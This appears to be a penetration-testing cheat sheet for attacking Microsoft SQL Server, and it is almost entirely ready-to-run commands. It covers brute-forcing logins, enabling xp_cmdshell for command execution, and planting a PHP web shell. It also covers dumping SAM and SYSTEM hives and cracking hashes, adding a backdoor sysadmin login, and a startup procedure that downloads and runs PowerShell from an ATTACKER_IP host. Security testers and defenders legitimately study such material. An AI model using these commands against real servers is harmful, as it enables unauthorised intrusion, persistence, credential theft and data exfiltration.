1433 MSSQL

Microsoft SQL Server

Environment Variables / Setup

export IP=
export PORT=1433
export USER=sa
export PASS=password
export DOMAIN=domain.local

Phase 1: MSSQL Service Discovery

Nmap MSSQL Scripts

nmap --script=ms-sql-* -p $PORT $IP

Service Detection

# Check MSSQL service
nmap -sV -p $PORT $IP

# UDP discovery (SQL Server Browser)
nmap -sU -p 1434 $IP

# Banner grabbing
telnet $IP $PORT

Phase 2: Authentication Testing

Anonymous Access Testing

# Test Windows authentication
impacket-mssqlclient $IP -windows-auth

# Test SQL authentication
impacket-mssqlclient $IP

Default Credentials Testing

# Common MSSQL default credentials
impacket-mssqlclient $USER:$PASS@$IP
impacket-mssqlclient sa:@$IP
impacket-mssqlclient sa:sa@$IP
impacket-mssqlclient sa:password@$IP
impacket-mssqlclient administrator:password@$IP

# Windows authentication
impacket-mssqlclient domain/user:password@$IP -windows-auth

Password Brute Force

# Using hydra
hydra -L /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt $IP mssql

# Using nmap
nmap --script ms-sql-brute --script-args userdb=/usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt,passdb=/usr/share/wordlists/rockyou.txt -p $PORT $IP

Phase 3: MSSQL Enumeration

Basic Information Gathering

# Connect to MSSQL
impacket-mssqlclient $USER:$PASS@$IP

# Basic enumeration
SELECT @@version;
SELECT USER_NAME();
SELECT DB_NAME();
SELECT name FROM sys.databases;
SELECT name FROM sys.tables;

Database and Table Enumeration

# List all databases
SELECT name FROM master.dbo.sysdatabases;

# Switch database
USE database_name;

# List tables in current database
SELECT table_name FROM information_schema.tables;

# List columns in table
SELECT column_name FROM information_schema.columns WHERE table_name='users';

# Show table contents
SELECT * FROM users;

User and Permission Enumeration

# Show current user
SELECT SYSTEM_USER;
SELECT USER;

# List all SQL logins
SELECT name FROM master.dbo.syslogins;

# Check sysadmin privileges
SELECT IS_SRVROLEMEMBER('sysadmin');

# List server roles
SELECT name FROM master.dbo.syslogins WHERE sysadmin = 1;

Phase 4: MSSQL Command Execution

xp_cmdshell (Primary Attack Vector)

# Check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

# Enable xp_cmdshell (requires sysadmin)
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

# Execute commands
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'ipconfig';
EXEC xp_cmdshell 'net user';

Alternative Command Execution Methods

# Using sp_OACreate (if xp_cmdshell blocked)
DECLARE @myshell INT;
EXEC sp_oacreate 'wscript.shell', @myshell OUTPUT;
EXEC sp_oamethod @myshell, 'run', null, 'cmd /c "echo test > c:\temp\test.txt"';

# Using SQL Agent Jobs (requires privileges)
USE msdb;
EXEC dbo.sp_add_job @job_name = 'test_job';
EXEC sp_add_jobstep @job_name = 'test_job', @step_name = 'test_step', @subsystem = 'cmdexec', @command = 'whoami > c:\temp\output.txt';
EXEC dbo.sp_add_jobserver @job_name = 'test_job';
EXEC dbo.sp_start_job N'test_job';

Phase 5: MSSQL File Operations

Reading Files

# Read files using BULK INSERT
CREATE TABLE temp (line varchar(8000));
BULK INSERT temp FROM 'c:\windows\system32\drivers\etc\hosts';
SELECT * FROM temp;
DROP TABLE temp;

# Using OPENROWSET (if enabled)
SELECT * FROM OPENROWSET(BULK 'c:\windows\system32\drivers\etc\hosts', SINGLE_CLOB) AS Contents;

Writing Files

# Write to file using bcp
EXEC xp_cmdshell 'echo "evil content" > c:\temp\evil.txt';

# Create web shell
EXEC xp_cmdshell 'echo ^<?php system($_GET["cmd"]); ?^> > c:\inetpub\wwwroot\shell.php';

Phase 6: MSSQL Privilege Escalation

Service Account Impersonation

# Check for impersonation privileges
SELECT name FROM sys.server_permissions p LEFT JOIN sys.server_principals pr ON pr.principal_id = p.grantee_principal_id WHERE p.permission_name = 'IMPERSONATE';

# Impersonate sa user
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER;

# Check current privileges after impersonation
SELECT IS_SRVROLEMEMBER('sysadmin');

Linked Server Exploitation

# Enumerate linked servers
SELECT name FROM master.dbo.sysservers WHERE isremote = 1;
EXEC sp_linkedservers;

# Execute queries on linked servers
SELECT * FROM OPENQUERY("LINKED_SERVER", 'SELECT @@version');

# Execute commands through linked servers
SELECT * FROM OPENQUERY("LINKED_SERVER", 'SELECT @@version; EXEC xp_cmdshell ''whoami''');

Phase 7: Hash Extraction

Extract Password Hashes

# Extract MSSQL hashes (requires sysadmin)
SELECT name, password_hash FROM sys.sql_logins;

# Extract Windows hashes via xp_cmdshell
EXEC xp_cmdshell 'reg save hklm\sam c:\temp\sam.save';
EXEC xp_cmdshell 'reg save hklm\security c:\temp\security.save';
EXEC xp_cmdshell 'reg save hklm\system c:\temp\system.save';

Crack Extracted Hashes

# Use hashcat for MSSQL hashes
hashcat -m 1731 mssql_hashes.txt /usr/share/wordlists/rockyou.txt

# Use john for extracted hashes
john --format=mssql hash_file.txt

Phase 8: Post-Exploitation

Persistence via MSSQL

# Create backdoor login
CREATE LOGIN backdoor WITH PASSWORD = 'P@ssw0rd123';
EXEC sp_addsrvrolemember 'backdoor', 'sysadmin';

# Create startup stored procedure
USE master;
CREATE PROCEDURE sp_backdoor AS EXEC xp_cmdshell 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(''http://ATTACKER_IP/shell.ps1'')"';
EXEC sp_procoption @ProcName = 'sp_backdoor', @OptionName = 'startup', @OptionValue = 'on';

Data Exfiltration

# Export database contents
EXEC xp_cmdshell 'sqlcmd -E -Q "SELECT * FROM database.dbo.users" -o "c:\temp\users.txt"';

# Backup database
BACKUP DATABASE database_name TO DISK = 'c:\temp\database_backup.bak';

Phase 9: MSSQL in Active Directory

Kerberos Authentication

# Connect using Kerberos ticket
impacket-mssqlclient -k -no-pass $DOMAIN/$USER@$IP.$DOMAIN

# Request service ticket for MSSQL
impacket-GetUserSPNs $DOMAIN/$USER:$PASS -dc-ip $DC_IP -target-domain $DOMAIN

Domain Privilege Escalation

# Check if MSSQL service runs as domain account
SELECT SERVERPROPERTY('IsIntegratedSecurityOnly');

# If service account has high privileges, abuse for domain escalation
EXEC xp_cmdshell 'powershell -c "whoami /priv"';

MSSQL Security Misconfigurations

Common Issues to Check

1. Default credentials (sa with weak/no password)
2. xp_cmdshell enabled with sysadmin access
3. Excessive service account privileges
4. Linked server misconfigurations
5. Impersonation privileges granted
6. SQL Agent job permissions
7. Weak authentication (SQL Server auth vs Windows auth)

MSSQL Enumeration Checklist

• Anonymous access testing
• Default credentials testing
• User enumeration and privilege checking
• Database and table discovery
• xp_cmdshell capability testing
• Linked server enumeration
• Impersonation privileges checking
• File read/write operations
• Hash extraction attempts

Tools Summary

# Enumeration & Exploitation
impacket-mssqlclient, nmap mssql scripts

# Hash cracking
hashcat, john

# Post-exploitation
sqlcmd, PowerShell, custom stored procedures

Common MSSQL Ports

1433/tcp  - MSSQL default
1434/udp  - SQL Server Browser Service

Next Steps

Once MSSQL access is gained:

1. Enable xp_cmdshell for command execution
2. Extract sensitive data from databases
3. Check for linked servers and lateral movement
4. Attempt privilege escalation via service accounts
5. Extract password hashes for further attacks

Resources

• HackTricks MSSQL
• MSSQL Injection Cheat Sheet
• Impacket MSSQL Examples